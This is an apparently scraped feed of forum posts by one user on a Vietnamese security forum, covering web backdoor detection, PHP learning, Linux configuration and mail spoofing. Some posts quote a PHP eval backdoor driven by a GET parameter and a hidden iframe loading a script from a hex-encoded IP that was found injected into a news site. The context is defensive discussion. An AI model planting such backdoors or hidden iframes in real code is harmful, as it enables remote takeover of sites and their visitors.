<![CDATA[Messages posted by "protectHat"]]> /hvaonline/posts/listByUser/176618.html JForum - http://www.jforum.net Hỏi về thiết kế hệ thống máy chủ web lớn /hvaonline/posts/preList/37352/240011.html#240011 /hvaonline/posts/preList/37352/240011.html#240011 GMT Nhận biết back-door của ứng dụng web

smile_sad wrote:
Theo mình nghĩ thông thường các folder cho phép upload chủ yếu là images,thumbs... Vậy nếu backdoor upload vào đây thì chắc nó là .php, .asp, .aspx... Mình rành linux hơn windows 1 chút nên mình xin nói về linux nhé. Ý kiến của mình là tạo 1 file .htaccess remove toàn bộ handler .php. Rồi chmod cái .htaccess này sao cho người ta không override nó được. Tuy nhiên nếu mà source code có quá nhiều folder cho phép upload, việc lạm dụng .htaccess sẽ ảnh hưởng đến performance của hệ thống. Do đó nếu bạn thành thạo code thì có lẽ phải can thiệp vào code để xứ lí thôi. Ở trên mình đưa ra tình huống là cái form upload đó đã chỉ định upload vào 1 folder trong sourcecode. Nhưng nếu attacker tạo mới 1 folder sau đó ném backdoor vào thì phải làm sao? Mọi người tiếp tục thảo luận nhé. 
backdoor thường có đuôi là .jpg bạn ạ :D; Dùng firephp là cách dễ nhất, đơn giản nhất đó. Nhưng mà dùng NULL thì dính backdoor là thường]]>
/hvaonline/posts/preList/39078/239962.html#239962 /hvaonline/posts/preList/39078/239962.html#239962 GMT
Nhận biết back-door của ứng dụng web

chiro8x wrote:
Bạn nghĩ sao về đoạn mã nhỏ này: Code:
<?php
....
if(isset($_GET['chiro8x']))eval($_GET['chiro8x']);
....
?>
Have fun ^^!. 
;-) Mình đã bị cái này nè Code:
<?php 
if ($date==time()) include(????)
?>
Nếu mà có thời gian ngồi coi từng dòng như vậy thì viết ra còn lẹ hơn :-O, nhưng mà project đã đến hạn nên phải tìm null :-( ]]>
/hvaonline/posts/preList/39078/239801.html#239801 /hvaonline/posts/preList/39078/239801.html#239801 GMT
Nhận biết back-door của ứng dụng web /hvaonline/posts/preList/39078/239725.html#239725 /hvaonline/posts/preList/39078/239725.html#239725 GMT Nên bắt đầu từ đâu khi học PHP

xnohat wrote:
Đúng vây, việc học một ngôn ngữ lập trình không đơn giản chỉ là học hiểu "cú pháp" ( Programming language sytax ), mà là tổ hợp nhiều kiến thức liên quan đến môn khoa học là khoa học máy tính ( Computer Science ). Vì, biết "cú pháp" của ngôn ngữ không, thì chẳng làm được việc gì, nếu không muốn nói là "vô ích", do ngôn ngữ lập trình chỉ là công cụ diễn dịch tư duy của con người thành các chỉ thị cho máy tính thực thi. 
Theo mình mốc thời gian đó có thể hiểu như là thời gian đi học. Học không chỉ một ngôn ngữ đó mà hình dung được mình sẽ làm được gì với nó. Từ những kiến thức về OOP, array ... thì việc mình học tiếp thêm một ngôn ngữ lập trình khác rất là nhanh. Hay nói cách khác là khi mình đã không biết được 1 ngôn ngữ nào cả thì việc học để master 1 cái rất là quan trọng và tốn thời gian. Khi đã được một cái rồi thì nhìn sang ngôn ngữ khác thấy đơn giản hơn. Khi đó mà mình muốn học ngôn ngữ khác thì chỉ cần học những cái khác, cái hay hơn so với cái đầu mà thôi. Thêm một ví dụ nữa là nhiều bạn hỏi nên chọn distro linux nào cho việc bắt đầu. Nhiều người sẽ nói bạn là hãy chọn 1 cái nào mà nhiều tài liệu, nhiều sự hỗ trợ thì dễ học. Sau khi dùng đã quen thì tự bản thân người hỏi sẽ biết là cái nào là phù hợp nhất cho mình]]>
/hvaonline/posts/preList/38441/237763.html#237763 /hvaonline/posts/preList/38441/237763.html#237763 GMT
Chiếm server khi đã có shell /hvaonline/posts/preList/38788/237478.html#237478 /hvaonline/posts/preList/38788/237478.html#237478 GMT Cần giúp đỡ về boot iso linux distro bằng grub /hvaonline/posts/preList/38759/237476.html#237476 /hvaonline/posts/preList/38759/237476.html#237476 GMT Hệ thống mail của cơ quan bị giả mạo

Bướm Đêm wrote:
ngừi ta đã bảo bị fake mail add, dùng google yahoo gì cũng fake và bulk được ráo heheheeeeeee, băm cả cái header nhìn ko ra lun ^^, có thể dùng script, dùng 1 cái mua hay cái tool gì đó lừa tình cái mta thì nó chuyển tới mta ngừi nhận nếu config ko ok, máy cái webmail free từ yahoo, google thì sao mà đỡ đc >"< google app cho 50 users dùng full chức năng mà kakakaaaa 
Nay nó giảm xuống 10 rồi bác]]>
/hvaonline/posts/preList/38657/237051.html#237051 /hvaonline/posts/preList/38657/237051.html#237051 GMT
Cấu hình apache web server trên linux /hvaonline/posts/preList/38671/237018.html#237018 /hvaonline/posts/preList/38671/237018.html#237018 GMT Cho tớ hỏi cách cài Fedora // với Windows /hvaonline/posts/preList/38623/236906.html#236906 /hvaonline/posts/preList/38623/236906.html#236906 GMT gateway có tới 2 MAC address là như thế nào /hvaonline/posts/preList/38600/236712.html#236712 /hvaonline/posts/preList/38600/236712.html#236712 GMT Cho mình cách xoá bớt các phiên bản update Ubuntu trong GNU

tommysmith wrote:
Thanks, mình làm được rồi :) mà mình vào folder boot tuy thấy mấy phiên bản cũ ở đó nhưng ko có quyền xoá, nên search thêm hồi thì thấy vào synaptic tìm mấy phiên bản cũ remove ok rồi :D 
Theo mình bạn có thể chỉnh trong boot/grub/grub.cfg để chỉnh menu thôi mà không xoá các kernel cũ]]>
/hvaonline/posts/preList/38485/236296.html#236296 /hvaonline/posts/preList/38485/236296.html#236296 GMT
Xin các anh giúp em, website em bị hack /hvaonline/posts/preList/38489/236189.html#236189 /hvaonline/posts/preList/38489/236189.html#236189 GMT Cứu người bị nạn với: dính virus, format C ghost lại, vẫn dính như cũ /hvaonline/posts/preList/38488/236188.html#236188 /hvaonline/posts/preList/38488/236188.html#236188 GMT Nên bắt đầu từ đâu khi học PHP /hvaonline/posts/preList/38441/235968.html#235968 /hvaonline/posts/preList/38441/235968.html#235968 GMT Các cách phát hiện máy bị nhiễm virus, trojan, kelog,... /hvaonline/posts/preList/36070/235858.html#235858 /hvaonline/posts/preList/36070/235858.html#235858 GMT Máy thật không ping vào được máy ảo. /hvaonline/posts/preList/38398/235786.html#235786 /hvaonline/posts/preList/38398/235786.html#235786 GMT Bác nào biết code của chuơng trình clear mật khẩu trong đĩa Hiren boot /hvaonline/posts/preList/38329/235752.html#235752 /hvaonline/posts/preList/38329/235752.html#235752 GMT Báo tuổi trẻ xài iframe này làm gì?

TQN wrote:
Không chắc, có thể máy của cậu protectHat dính virus thì sao ? 
Em có thử cả với máy win và 1 máy Ubuntu rồi mới hỏi mà anh? Tại vì sợ lỡ như mạng bị dính virus mà nó chèn cái iframe lên đầu trang như vậy mà báo cho bên tuổi trẻ thì phiền nên em mới hỏi mọi người PS: Hôm nay vào lại đúng là đã được gỡ ra]]>
/hvaonline/posts/preList/38335/235750.html#235750 /hvaonline/posts/preList/38335/235750.html#235750 GMT
Báo tuổi trẻ xài iframe này làm gì? Code:
iframe src="http://0x56378C02/25mini/irhqbujzeshod.php" width=0 height=0 frameborder=0></iframe
Mọi người xem giùm mình đó là tại máy mình hay tại báo vậy. Đoạn đó đếm gì mà mình coi không được >]]>
/hvaonline/posts/preList/38335/235488.html#235488 /hvaonline/posts/preList/38335/235488.html#235488 GMT
Tăng cường bảo vệ cho hệ thống mạng nội bộ sử dụng DMZ /hvaonline/posts/preList/38229/235070.html#235070 /hvaonline/posts/preList/38229/235070.html#235070 GMT tienich-online.us có nguy hiểm không? /hvaonline/posts/preList/38038/234623.html#234623 /hvaonline/posts/preList/38038/234623.html#234623 GMT đọc nội dung web bằng javascript ? /hvaonline/posts/preList/37814/232584.html#232584 /hvaonline/posts/preList/37814/232584.html#232584 GMT đọc nội dung web bằng javascript ? Code:
$(document).ready(function(){ 
	function contentDisp(){
		$.ajax({
			url : "1.txt",
			success : function (data) {
				$("#content").html(data);
			}
		});
	}
	contentDisp();
});
]]>
/hvaonline/posts/preList/37814/232546.html#232546 /hvaonline/posts/preList/37814/232546.html#232546 GMT
Khong cho user copy file về máy client /hvaonline/posts/preList/37728/232324.html#232324 /hvaonline/posts/preList/37728/232324.html#232324 GMT Khong cho user copy file về máy client /hvaonline/posts/preList/37728/232200.html#232200 /hvaonline/posts/preList/37728/232200.html#232200 GMT Lập trình web căn bản /hvaonline/posts/preList/28372/232126.html#232126 /hvaonline/posts/preList/28372/232126.html#232126 GMT Lập trình web căn bản /hvaonline/posts/preList/28372/231292.html#231292 /hvaonline/posts/preList/28372/231292.html#231292 GMT cài đặt nhiều hệ điều hành ( win xp , window 7, mac osx, ubuntu) trên http://www.apple.com/opensource/ đoạn Code:
As the first major computer company to make Open Source development a key part of its ongoing software strategy, Apple remains committed to the Open Source development model. Major components of Mac OS X, including the UNIX core, are made available under Apple’s Open Source license, allowing developers and students to view source code, learn from it and submit suggestions and modifications. In addition, Apple uses software created by the Open Source community, such as the HTML rendering engine for Safari, and returns its enhancements to the community.
Thì cái nhân của nó được phân phối theo Apple’s Open Source license. Còn nguyên cái mac os x thì là close source :D. ]]>
/hvaonline/posts/preList/37323/229794.html#229794 /hvaonline/posts/preList/37323/229794.html#229794 GMT
hoi ve cach khai thac thong tin mot nick yahoo
:P ]]>
/hvaonline/posts/preList/37326/229695.html#229695 /hvaonline/posts/preList/37326/229695.html#229695 GMT